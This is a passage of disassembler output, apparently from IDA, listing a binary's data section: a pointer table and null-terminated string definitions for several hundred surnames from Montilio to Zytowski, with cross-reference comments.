dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
dd offset aStam ; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset aVanheeckeren ; "Vanheeckeren"
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset aVorhaus ; "Vorhaus"
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
aZytowski db 'Zytowski',0 ; DATA XREF: .data:0042EBD4�o
align 4
aZwiers db 'Zwiers',0 ; DATA XREF: .data:0042EBD0�o
align 4
aZurn db 'Zurn',0 ; DATA XREF: .data:0042EBCC�o
align 4
aZucconi db 'Zucconi',0 ; DATA XREF: .data:0042EBC8�o
aZoldak db 'Zoldak',0 ; DATA XREF: .data:0042EBC4�o
align 4
aZerbini db 'Zerbini',0 ; DATA XREF: .data:0042EBC0�o
aZegans db 'Zegans',0 ; DATA XREF: .data:0042EBBC�o
align 4
aZangwill db 'Zangwill',0 ; DATA XREF: .data:0042EBB8�o
align 10h
aZahedi db 'Zahedi',0 ; DATA XREF: .data:0042EBB4�o
align 4
aZachary db 'Zachary',0 ; DATA XREF: .data:0042EBB0�o
aYu db 'Yu',0 ; DATA XREF: .data:0042EBAC�o
align 4
aYoukSee db 'Youk-See',0 ; DATA XREF: .data:0042EBA8�o
align 10h
aYoo db 'Yoo',0 ; DATA XREF: .data:0042EBA4�o
aYoffe db 'Yoffe',0 ; DATA XREF: .data:0042EBA0�o
align 4
aYetiv db 'Yetiv',0 ; DATA XREF: .data:0042EB9C�o
align 4
aYesson db 'Yesson',0 ; DATA XREF: .data:0042EB98�o
align 4
aYedidia db 'Yedidia',0 ; DATA XREF: .data:0042EB94�o
aYbarra db 'Ybarra',0 ; DATA XREF: .data:0042EB90�o
align 4
aYates db 'Yates',0 ; DATA XREF: .data:0042EB8C�o
align 4
aYarchuk db 'Yarchuk',0 ; DATA XREF: .data:0042EB88�o
aYankee db 'Yankee',0 ; DATA XREF: .data:0042EB84�o
align 4
aYamane db 'Yamane',0 ; DATA XREF: .data:0042EB80�o
align 4
aYacono db 'Yacono',0 ; DATA XREF: .data:0042EB7C�o
align 4
aVotey db 'Votey',0 ; DATA XREF: .data:0042EB78�o
align 4
aVorhaus db 'Vorhaus',0 ; DATA XREF: .data:0042EB74�o
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: .data:0042EB70�o
align 4
aWoods db 'Woods',0 ; DATA XREF: .data:0042EB6C�o
align 4
aWooden db 'Wooden',0 ; DATA XREF: .data:0042EB68�o
align 4
aWoo db 'Woo',0 ; DATA XREF: .data:0042EB64�o
aVonhoffman db 'VonHoffman',0 ; DATA XREF: .data:0042EB60�o
align 4
aWolk db 'Wolk',0 ; DATA XREF: .data:0042EB5C�o
align 4
aVoigt db 'Voigt',0 ; DATA XREF: .data:0042EB58�o
align 4
aViviani db 'Viviani',0 ; DATA XREF: .data:0042EB54�o
aVitali db 'Vitali',0 ; DATA XREF: .data:0042EB50�o
align 4
aWilson db 'Wilson',0 ; DATA XREF: .data:0042EB4C�o
align 4
aWillstatter db 'Willstatter',0 ; DATA XREF: .data:0042EB48�o
aVillarreal db 'Villarreal',0 ; DATA XREF: .data:0042EB44�o
align 4
aWilkinson db 'Wilkinson',0 ; DATA XREF: .data:0042EB40�o
align 10h
aWilkin db 'Wilkin',0 ; DATA XREF: .data:0042EB3C�o
align 4
aWilk db 'Wilk',0 ; DATA XREF: .data:0042EB38�o
align 10h
aWilhelm db 'Wilhelm',0 ; DATA XREF: .data:0042EB34�o
aWilder db 'Wilder',0 ; DATA XREF: .data:0042EB30�o
align 10h
aVignola db 'Vignola',0 ; DATA XREF: .data:0042EB2C�o
aViens db 'Viens',0 ; DATA XREF: .data:0042EB28�o
align 10h
aWiener db 'Wiener',0 ; DATA XREF: .data:0042EB24�o
align 4
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: .data:0042EB20�o
aViano db 'Viano',0 ; DATA XREF: .data:0042EB1C�o
align 4
aViana db 'Viana',0 ; DATA XREF: .data:0042EB18�o
align 4
aWhittaker db 'Whittaker',0 ; DATA XREF: .data:0042EB14�o
align 10h
aWhitla db 'Whitla',0 ; DATA XREF: .data:0042EB10�o
align 4
aWhite db 'White',0 ; DATA XREF: .data:0042EB0C�o
align 10h
aWhilton db 'Whilton',0 ; DATA XREF: .data:0042EB08�o
aWhately db 'Whately',0 ; DATA XREF: .data:0042EB04�o
aWetzel db 'Wetzel',0 ; DATA XREF: .data:0042EB00�o
align 4
aWescott db 'Wescott',0 ; DATA XREF: .data:0042EAFC�o
aVerghese db 'Verghese',0 ; DATA XREF: .data:0042EAF8�o
align 4
aVenne db 'Venne',0 ; DATA XREF: .data:0042EAF4�o
align 4
aWengret db 'Wengret',0 ; DATA XREF: .data:0042EAF0�o
aWelsh db 'Welsh',0 ; DATA XREF: .data:0042EAEC�o
align 4
aWelles db 'Welles',0 ; DATA XREF: .data:0042EAE8�o
align 4
aVelasquez db 'Velasquez',0 ; DATA XREF: .data:0042EAE4�o
align 4
aWeissman db 'Weissman',0 ; DATA XREF: .data:0042EAE0�o
align 4
aWeissbourd db 'Weissbourd',0 ; DATA XREF: .data:0042EADC�o
align 10h
aWeinhaus db 'Weinhaus',0 ; DATA XREF: .data:0042EAD8�o
align 4
aWeingarten db 'Weingarten',0 ; DATA XREF: .data:0042EAD4�o
align 4
aWeighart db 'Weighart',0 ; DATA XREF: .data:0042EAD0�o
align 4
aWaugh db 'Waugh',0 ; DATA XREF: .data:0042EACC�o
align 4
aVasquez db 'Vasquez',0 ; DATA XREF: .data:0042EAC8�o
aWasowska db 'Wasowska',0 ; DATA XREF: .data:0042EAC4�o
align 10h
aWarshafsky db 'Warshafsky',0 ; DATA XREF: .data:0042EAC0�o
align 4
aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: .data:0042EABC�o
align 4
aVandenberg db 'Vandenberg',0 ; DATA XREF: .data:0042EAB8�o
align 4
aVanzwet db 'VanZwet',0 ; DATA XREF: .data:0042EAB4�o
aVanallen db 'vanAllen',0 ; DATA XREF: .data:0042EAB0�o
align 4
aWalter db 'Walter',0 ; DATA XREF: .data:0042EAAC�o
align 4
aWallenberg db 'Wallenberg',0 ; DATA XREF: .data:0042EAA8�o
align 10h
aWales db 'Wales',0 ; DATA XREF: .data:0042EAA4�o
align 4
aValencia db 'Valencia',0 ; DATA XREF: .data:0042EAA0�o
align 4
aValberg db 'Valberg',0 ; DATA XREF: .data:0042EA9C�o
aWaite db 'Waite',0 ; DATA XREF: .data:0042EA98�o
align 4
aVacca db 'Vacca',0 ; DATA XREF: .data:0042EA94�o
align 4
aUzuner db 'Uzuner',0 ; DATA XREF: .data:0042EA90�o
align 4
aUsdan db 'Usdan',0 ; DATA XREF: .data:0042EA8C�o
align 4
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: .data:0042EA88�o
align 4
aUrban db 'Urban',0 ; DATA XREF: .data:0042EA84�o
align 4
aUpsdell db 'Upsdell',0 ; DATA XREF: .data:0042EA80�o
aUntermeyer db 'Untermeyer',0 ; DATA XREF: .data:0042EA7C�o
align 4
aUllman db 'Ullman',0 ; DATA XREF: .data:0042EA78�o
align 10h
aTzamarias db 'Tzamarias',0 ; DATA XREF: .data:0042EA74�o
align 4
aTwells db 'Twells',0 ; DATA XREF: .data:0042EA70�o
align 4
aTuttle db 'Tuttle',0 ; DATA XREF: .data:0042EA6C�o
align 4
aTurek db 'Turek',0 ; DATA XREF: .data:0042EA68�o
align 4
aTurano db 'Turano',0 ; DATA XREF: .data:0042EA64�o
align 4
aTukan db 'Tukan',0 ; DATA XREF: .data:0042EA60�o
align 4
aTudge db 'Tudge',0 ; DATA XREF: .data:0042EA5C�o
align 4
aTuck db 'Tuck',0 ; DATA XREF: .data:0042EA58�o
align 4
aTsukurov db 'Tsukurov',0 ; DATA XREF: .data:0042EA54�o
align 10h
aTsomides db 'Tsomides',0 ; DATA XREF: .data:0042EA50�o
align 4
aTsiatis db 'Tsiatis',0 ; DATA XREF: .data:0042EA4C�o
aTruss db 'Truss',0 ; DATA XREF: .data:0042EA48�o
align 4
aTroy db 'Troy',0 ; DATA XREF: .data:0042EA44�o
align 4
aTroiani db 'Troiani',0 ; DATA XREF: .data:0042EA40�o
aTringali db 'Tringali',0 ; DATA XREF: .data:0042EA3C�o
align 4
aTrewin db 'Trewin',0 ; DATA XREF: .data:0042EA38�o
align 10h
aTrenga db 'Trenga',0 ; DATA XREF: .data:0042EA34�o
align 4
aTraebert db 'Traebert',0 ; DATA XREF: .data:0042EA30�o
align 4
aToye db 'Toye',0 ; DATA XREF: .data:0042EA2C�o
align 4
aTowler db 'Towler',0 ; DATA XREF: .data:0042EA28�o
align 4
aTorske db 'Torske',0 ; DATA XREF: .data:0042EA24�o
align 4
aTorresi db 'Torresi',0 ; DATA XREF: .data:0042EA20�o
aTopulos db 'Topulos',0 ; DATA XREF: .data:0042EA1C�o
aToomer db 'Toomer',0 ; DATA XREF: .data:0042EA18�o
align 4
aTomford db 'Tomford',0 ; DATA XREF: .data:0042EA14�o
aTolman db 'Tolman',0 ; DATA XREF: .data:0042EA10�o
align 4
aTolls db 'Tolls',0 ; DATA XREF: .data:0042EA0C�o
align 4
aTollestrup db 'Tollestrup',0 ; DATA XREF: .data:0042EA08�o
align 4
aTofallis db 'Tofallis',0 ; DATA XREF: .data:0042EA04�o
align 4
aTimmons db 'Timmons',0 ; DATA XREF: .data:0042EA00�o
aTill db 'Till',0 ; DATA XREF: .data:0042E9FC�o
align 4
aTierney db 'Tierney',0 ; DATA XREF: .data:0042E9F8�o
aThroop db 'Throop',0 ; DATA XREF: .data:0042E9F4�o
align 4
aThomsen db 'Thomsen',0 ; DATA XREF: .data:0042E9F0�o
aThisted db 'Thisted',0 ; DATA XREF: .data:0042E9EC�o
aThibault db 'Thibault',0 ; DATA XREF: .data:0042E9E8�o
align 10h
aTheodos db 'Theodos',0 ; DATA XREF: .data:0042E9E4�o
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: .data:0042E9E0�o
align 4
aThan db 'Than',0 ; DATA XREF: .data:0042E9DC�o
align 10h
aTerracini db 'Terracini',0 ; DATA XREF: .data:0042E9D8�o
align 4
aTenney db 'Tenney',0 ; DATA XREF: .data:0042E9D4�o
align 4
aTemmer db 'Temmer',0 ; DATA XREF: .data:0042E9D0�o
align 4
aTemes db 'Temes',0 ; DATA XREF: .data:0042E9CC�o
align 4
aTeague db 'Teague',0 ; DATA XREF: .data:0042E9C8�o
align 4
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: .data:0042E9C4�o
align 4
aTawn db 'Tawn',0 ; DATA XREF: .data:0042E9C0�o
align 10h
aTaveras db 'Taveras',0 ; DATA XREF: .data:0042E9BC�o
aTatar db 'Tatar',0 ; DATA XREF: .data:0042E9B8�o
align 10h
aTanowitz db 'Tanowitz',0 ; DATA XREF: .data:0042E9B4�o
align 4
aTandler db 'Tandler',0 ; DATA XREF: .data:0042E9B0�o
aTambiah db 'Tambiah',0 ; DATA XREF: .data:0042E9AC�o
aTalaugon db 'Talaugon',0 ; DATA XREF: .data:0042E9A8�o
align 4
aTai db 'Tai',0 ; DATA XREF: .data:0042E9A4�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: .data:0042E9A0�o
aSwindle db 'Swindle',0 ; DATA XREF: .data:0042E99C�o
aSweetser db 'Sweetser',0 ; DATA XREF: .data:0042E998�o
align 4
aSweeting db 'Sweeting',0 ; DATA XREF: .data:0042E994�o
align 4
aSurdam db 'Surdam',0 ; DATA XREF: .data:0042E990�o
align 4
aSuo db 'Suo',0 ; DATA XREF: .data:0042E98C�o
aSumner db 'Sumner',0 ; DATA XREF: .data:0042E988�o
align 4
aSullivan db 'Sullivan',0 ; DATA XREF: .data:0042E984�o
align 4
aStringer db 'Stringer',0 ; DATA XREF: .data:0042E980�o
align 10h
aStreiff db 'Streiff',0 ; DATA XREF: .data:0042E97C�o
aStrauch db 'Strauch',0 ; DATA XREF: .data:0042E978�o
aStrange db 'Strange',0 ; DATA XREF: .data:0042E974�o
aStott db 'Stott',0 ; DATA XREF: .data:0042E970�o
align 10h
aStorer db 'Storer',0 ; DATA XREF: .data:0042E96C�o
align 4
aStonich db 'Stonich',0 ; DATA XREF: .data:0042E968�o
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: .data:0042E964�o
aStockwell db 'Stockwell',0 ; DATA XREF: .data:0042E960�o
align 4
aStockton db 'Stockton',0 ; DATA XREF: .data:0042E95C�o
align 4
aStock db 'Stock',0 ; DATA XREF: .data:0042E958�o
align 4
aStillwell db 'Stillwell',0 ; DATA XREF: .data:0042E954�o
align 4
aStiepock db 'Stiepock',0 ; DATA XREF: .data:0042E950�o
align 4
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: .data:0042E94C�o
align 4
aStepniewska db 'Stepniewska',0 ; DATA XREF: .data:0042E948�o
aStephanian db 'Stephanian',0 ; DATA XREF: .data:0042E944�o
align 4
aSteiner db 'Steiner',0 ; DATA XREF: .data:0042E940�o
aStefani db 'Stefani',0 ; DATA XREF: .data:0042E93C�o
aStatlender db 'Statlender',0 ; DATA XREF: .data:0042E938�o
align 4
aStates db 'States',0 ; DATA XREF: .data:0042E934�o
align 10h
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: .data:0042E930�o
align 10h
aStang db 'Stang',0 ; DATA XREF: .data:0042E92C�o
align 4
aStam db 'Stam',0 ; DATA XREF: .data:0042E928�o
align 10h
aStalvey db 'Stalvey',0 ; DATA XREF: .data:0042E924�o
aStmartin db 'StMartin',0 ; DATA XREF: .data:0042E920�o
align 4
aSpinrad db 'Spinrad',0 ; DATA XREF: .data:0042E91C�o
aSpiliotis db 'Spiliotis',0 ; DATA XREF: .data:0042E918�o
align 4
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: .data:0042E914�o
align 4
aSpicer db 'Spicer',0 ; DATA XREF: .data:0042E910�o
align 10h
aSperber db 'Sperber',0 ; DATA XREF: .data:0042E90C�o
aSpence db 'Spence',0 ; DATA XREF: .data:0042E908�o
align 10h
aSpeizer db 'Speizer',0 ; DATA XREF: .data:0042E904�o
aSpaulding db 'Spaulding',0 ; DATA XREF: .data:0042E900�o
align 4
aSparrow db 'Sparrow',0 ; DATA XREF: .data:0042E8FC�o
aSpanier db 'Spanier',0 ; DATA XREF: .data:0042E8F8�o
aSoultanian db 'Soultanian',0 ; DATA XREF: .data:0042E8F4�o
align 10h
